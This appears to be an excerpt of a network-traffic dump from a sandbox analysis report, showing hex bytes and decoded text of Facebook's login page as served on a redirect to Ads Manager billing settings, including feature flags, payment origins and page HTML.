                                                                                    Data Ascii: ,[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREATE_FOR_SAP","EO_DISABLE_SYSTEM_SERIAL_NUMBER_FREE_TYPING_IN_CPE_NON_CLIENT","MOBILITY_KILL_OLD_VISIBILITY_POSITION_SETTING","WORKPLACE_DISPLAY_TEXT_EVIDENCE_REPORTING","BUSINESS_INV
                                                                                    2023-02-07 18:46:25 UTC1332INData Raw: 7a 76 50 33 77 22 2c 22 34 4e 53 71 33 5a 43 34 53 63 45 22 2c 22 35 33 67 43 78 4b 71 32 38 31 47 22 2c 22 33 79 7a 7a 77 42 59 37 4e 70 6a 22 2c 22 31 6f 6e 7a 49 76 30 6a 48 36 48 22 2c 22 38 50 6c 4b 75 6f 77 61 66 65 38 22 2c 22 31 6e 74 6a 5a 32 7a 67 66 30 33 22 2c 22 34 53 49 48 32 47 52 56 58 35 57 22 2c 22 32 64 68 71 52 6e 71 58 47 4c 51 22 2c 22 32 57 67 69 4e 4f 72 48 56 75 43 22 2c 22 61 6d 4b 48 62 34 43 77 34 57 49 22 2c 22 38 72 44 76 4e 39 76 57 64 41 4b 22 2c 22 35 42 64 7a 57 47 6d 66 76 72 41 22 2c 22 44 44 5a 68 6f 67 49 31 39 57 22 2c 22 61 63 72 4a 54 68 39 57 47 64 70 22 2c 22 31 6f 4f 45 36 34 66 4c 34 77 4f 22 2c 22 35 58 43 7a 31 68 39 49 61 77 33 22 2c 22 37 72 36 6d 53 50 37 6f 66 72 32 22 2c 22 36 44 47 50 4c 72 52 64 79 74
                                                                                    Data Ascii: zvP3w","4NSq3ZC4ScE","53gCxKq281G","3yzzwBY7Npj","1onzIv0jH6H","8PlKuowafe8","1ntjZ2zgf03","4SIH2GRVX5W","2dhqRnqXGLQ","2WgiNOrHVuC","amKHb4Cw4WI","8rDvN9vWdAK","5BdzWGmfvrA","DDZhogI19W","acrJTh9WGdp","1oOE64fL4wO","5XCz1h9Iaw3","7r6mSP7ofr2","6DGPLrRdyt
                                                                                    2023-02-07 18:46:25 UTC1334INData Raw: 69 6e 73 22 3a 5b 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 69 76 65 2e 61 64 79 65 6e 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6e 74 65 67 72 61 74 69 6f 6e 2d 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 2e 69 6e 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 6c 61 74 61 6d 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 65 63 75 72 65 2e 70 61 79 75 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 64 6c 6f 63 61 6c 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 62 75 79 32 2e 62 6f 6b 75 2e 63 6f 6d 22 5d 7d 2c 34 39 32 30 5d 2c 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 45 6e 64 70 6f 69 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 62 75 67 4e 6f 42 61 74 63 68 69 6e 67 22 3a 66 61
                                                                                    Data Ascii: ins":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:\/\/buy2.boku.com"]},4920],["BootloaderEndpointConfig",[],{"debugNoBatching":fa
                                                                                    2023-02-07 18:46:25 UTC1335INData Raw: 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65 67 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 66 72 65 65 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61 63 79 5c 2f 65 78 70 6c 61 6e 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65
                                                                                    Data Ascii: r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle
                                                                                    2023-02-07 18:46:25 UTC1337INData Raw: 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 73 65 74 74 69 6e 67 73 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 61 6c 6f 68 61 5f 63 68 65 63 6b 5f 62 75 69 6c 64 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 7a 62 64 5c 2f 73 6f 66 74 6e 75 64 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 61 63 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 72 65 64 69 72 65 63 74
                                                                                    Data Ascii: ":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/zero\/af_transition\/":1,"\/mobile\/zero\/af_transition\/action\/":1,"\/mobile\/zero\/freemium\/":1,"\/mobile\/zero\/freemium\/redirect
                                                                                    2023-02-07 18:46:25 UTC1338INData Raw: 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 5c 2f 73 75 62 6d 69 74 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 65 64 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5f 63 68 61 6e 67 65 5c 2f 22 3a 31 2c 22 5c 2f 68 65 6c 70 5c 2f 63 6f 6e 74 61 63 74 5c 2f 22 3a 31 2c 22 5c 2f 73 75 72 76 65 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 79 61 6c 74 79 74 6f 70 75 70 5c 2f 61 63 63 65 70 74 5c 2f 22 3a 31 2c 22 5c 2f 73 65 74 74 69 6e 67 73
                                                                                    Data Ascii: \/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/":1,"\/preconfirmation\/contactpoint_change\/":1,"\/help\/contact\/":1,"\/survey\/":1,"\/upsell\/loyaltytopup\/accept\/":1,"\/settings
                                                                                    2023-02-07 18:46:25 UTC1339INData Raw: 36 35 65 30 0d 0a 6c 75 41 31 76 6a 46 32 56 34 4e 65 79 30 38 70 68 4b 2d 47 35 34 7c 66 64 2e 41 63 62 55 54 70 6b 77 4f 41 51 52 32 50 48 79 44 43 33 70 5f 68 6b 4f 6e 76 39 55 47 72 68 64 4b 30 7a 57 48 41 47 69 69 47 44 71 38 46 56 30 34 59 77 4c 55 61 76 6a 79 35 73 73 75 4b 65 4b 66 31 6b 6e 48 59 78 57 51 4d 67 71 75 74 36 50 4a 42 73 74 55 4a 61 33 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72
                                                                                    Data Ascii: 65e0luA1vjF2V4Ney08phK-G54|fd.AcbUTpkwOAQR2PHyDC3p_hkOnv9UGrhdK0zWHAGiiGDq8FV04YwLUavjy5ssuKeKf1knHYxWQMgqut6PJBstUJa3","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer
                                                                                    2023-02-07 18:46:25 UTC1340INData Raw: 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 31 6f 56 51 4f 30 79 57 79 76 66 61 6f 46 73 39 77 53 4f 65 61 51 6c 55 50 79 45 62 48 50 38 66 61 77 44 6e 64 64 4d 71 58 4b 45 67 4b 70 4d 5f 39 6b 6f 43 35 50 6b 35 2d 50 38 71 68 69 65 5f 75 66 35 4b 43 4a 6a 79 4e 73 50 68 63 45 58 46 4e 56 4e 55 43 57 6e 4c 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 31 6f 56 51 4f 30 79 57 79 76 66 61 6f 46 73 39 77 53 4f 65 61 51 6c 55 50 79 45 62 48 50 38 66 61 77 44 6e 64 64 4d 71 58 4b 45 67 4b 70 4d 5f
                                                                                    Data Ascii: itionsBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"],{"__rc":["setTimeoutAcrossTransitionsBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_
                                                                                    2023-02-07 18:46:25 UTC1342INData Raw: 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 62 6f 6f 73 74 22 3a 7b 7d 2c 22 65 76 65 6e 74 5f 74 79 70 65 73 22 3a 7b 7d 2c 22 6d 61 6e 75 61 6c 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 70 72 6f 66 69 6c 65 5f 65 61 67 65 72 5f 65 78 65 63 75 74 69 6f 6e
                                                                                    Data Ascii: mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{},"interaction_boost":{},"event_types":{},"manual_instrumentation":false,"profile_eager_execution
                                                                                    2023-02-07 18:46:25 UTC1343INData Raw: 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 37 35 37 39 35 35 38 35 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 34 5f 7a 31 22 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 20 64 61 74 61 2d 72 65 66 65 72 72 65 72 3d 22 70 61 67 65 6c 65 74 5f 62 6c 75 65 62 61 72 22 3e 3c 64 69 76 20 69 64 3d 22 62 6c 75 65 42 61 72 44 4f 4d 49 6e 73 70 65 63 74 6f 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 33 6a 68 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 67 65 64 6f 75 74 5f 6d 65 6e 75 62 61 72 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76
                                                                                    Data Ascii: requireLazy(["bootstrapWebSession"],function(j){j(1675795585)})</script><div class="_li" id="u_0_4_z1"><div id="pagelet_bluebar" data-referrer="pagelet_bluebar"><div id="blueBarDOMInspector"><div class="_53jh"><div class="loggedout_menubar_container"><div
                                                                                    2023-02-07 18:46:25 UTC1345INData Raw: 74 64 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 6c 61 62 65 6c 5f 66 69 65 6c 64 22 3e 3c 2f 74 64 3e 3c 74 64 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 6c 61 62 65 6c 5f 66 69 65 6c 64 22 3e 3c 64 69 76 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 72 65 63 6f 76 65 72 2f 69 6e 69 74 69 61 74 65 3f 6c 77 76 3d 31 30 30 26 61 6d 70 3b 61 72 73 3d 72 6f 79 61 6c 5f 62 6c 75 65 5f 62 61 72 22 3e 46 6f 72 67 6f 74 20 61 63 63 6f 75 6e 74 3f 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65
                                                                                    Data Ascii: td class="login_form_label_field"></td><td class="login_form_label_field"><div><a href="https://www.facebook.com/recover/initiate?lwv=100&amp;ars=royal_blue_bar">Forgot account?</a></div></td></tr></table><input type="hidden" autocomplete="off" name="time
                                                                                    2023-02-07 18:46:25 UTC1346INData Raw: 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 75 69 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 61 72 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 62 5f 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 20 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 55 49 46 75 6c 6c 50 61 67 65 5f 43 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 76 6c 20 70 74 6d 20 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 20 75 69 49 6e 74 65 72 73 74 69 74 69 61 6c 4c 61 72 67 65 20 75 69 42 6f
                                                                                    Data Ascii: a></span></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div class="fb_content clearfix " id="content" role="main"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial uiInterstitialLarge uiBo
                                                                                    2023-02-07 18:46:25 UTC1348INData Raw: 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 64 65 5f 44 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77
                                                                                    Data Ascii: IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;w
                                                                                    2023-02-07 18:46:25 UTC1349INData Raw: 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 70 74 5f 50 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61
                                                                                    Data Ascii: nager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fma
                                                                                    2023-02-07 18:46:25 UTC1351INData Raw: 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 74 72 5f 54 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 74 72 2d 74 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e
                                                                                    Data Ascii: /tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login
                                                                                    2023-02-07 18:46:25 UTC1352INData Raw: e0 a4 a8 e0 a5 8d e0 a4 a6 e0 a5 80 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f
                                                                                    Data Ascii: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quo
                                                                                    2023-02-07 18:46:25 UTC1353INData Raw: 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6c 61 63 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 70 6f 70 75 6c 61 72 20 70 6c 61 63 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 6c 61 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 61 6d 65 73 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 67 61 6d 65 73 2e 22 3e 47 61 6d 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6d 61 72 6b 65 74 70 6c 61 63 65 2f 22 20 74 69 74 6c 65 3d 22 42 75 79 20 61 6e 64 20 73 65 6c 6c 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 20 4d 61 72 6b 65 74 70 6c 61 63 65 2e 22 3e 4d 61 72 6b 65 74 70 6c 61 63 65 3c 2f 61 3e 3c
                                                                                    Data Ascii: ch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a><
                                                                                    2023-02-07 18:46:25 UTC1355INData Raw: 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 63 65 6e 74 65 72 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 6d 61 6e 61 67 65 20 61 6e 64 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 67 72 6f 75 70 73 2f 65 78 70 6c 6f 72 65 2f 22 20 74 69 74 6c 65 3d 22 45 78 70 6c 6f 72 65 20 6f 75 72 20 47 72 6f 75 70 73 2e 22 3e 47 72 6f 75 70 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 6f 75 74 2e 6d
                                                                                    Data Ascii: <li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">Privacy Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.m
                                                                                    2023-02-07 18:46:25 UTC1356INData Raw: 73 6b 65 79 3d 22 36 22 20 63 6c 61 73 73 3d 22 61 63 63 65 73 73 69 62 6c 65 5f 65 6c 65 6d 22 20 68 72 65 66 3d 22 2f 73 65 74 74 69 6e 67 73 22 20 74 69 74 6c 65 3d 22 56 69 65 77 20 61 6e 64 20 65 64 69 74 20 79 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 73 65 74 74 69 6e 67 73 2e 22 3e 53 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 61 63 63 65 73 73 6b 65 79 3d 22 37 22 20 63 6c 61 73 73 3d 22 61 63 63 65 73 73 69 62 6c 65 5f 65 6c 65 6d 22 20 68 72 65 66 3d 22 2f 61 6c 6c 61 63 74 69 76 69 74 79 3f 70 72 69 76 61 63 79 5f 73 6f 75 72 63 65 3d 61 63 74 69 76 69 74 79 5f 6c 6f 67 5f 74 6f 70 5f 6d 65 6e 75 22 20 74 69 74 6c 65 3d 22 56 69 65 77 20 79 6f 75 72 20 61 63 74 69 76 69 74 79 20 6c 6f 67 22 3e 41 63 74 69 76 69 74 79 20
                                                                                    Data Ascii: skey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">Settings</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="View your activity log">Activity
                                                                                    2023-02-07 18:46:25 UTC1358INData Raw: 72 37 61 6c 52 69 51 46 30 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 37 67 34 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30 56 2d 51 5f 7a 66 45 79 6b 7a 6e 4f 36 6c 45 22 7d 2c 22 31 30 39 39 38 39 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6b 6c 79 32 4c 53 5a 56 5f 44 4b 47 52 65 4d 34 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66
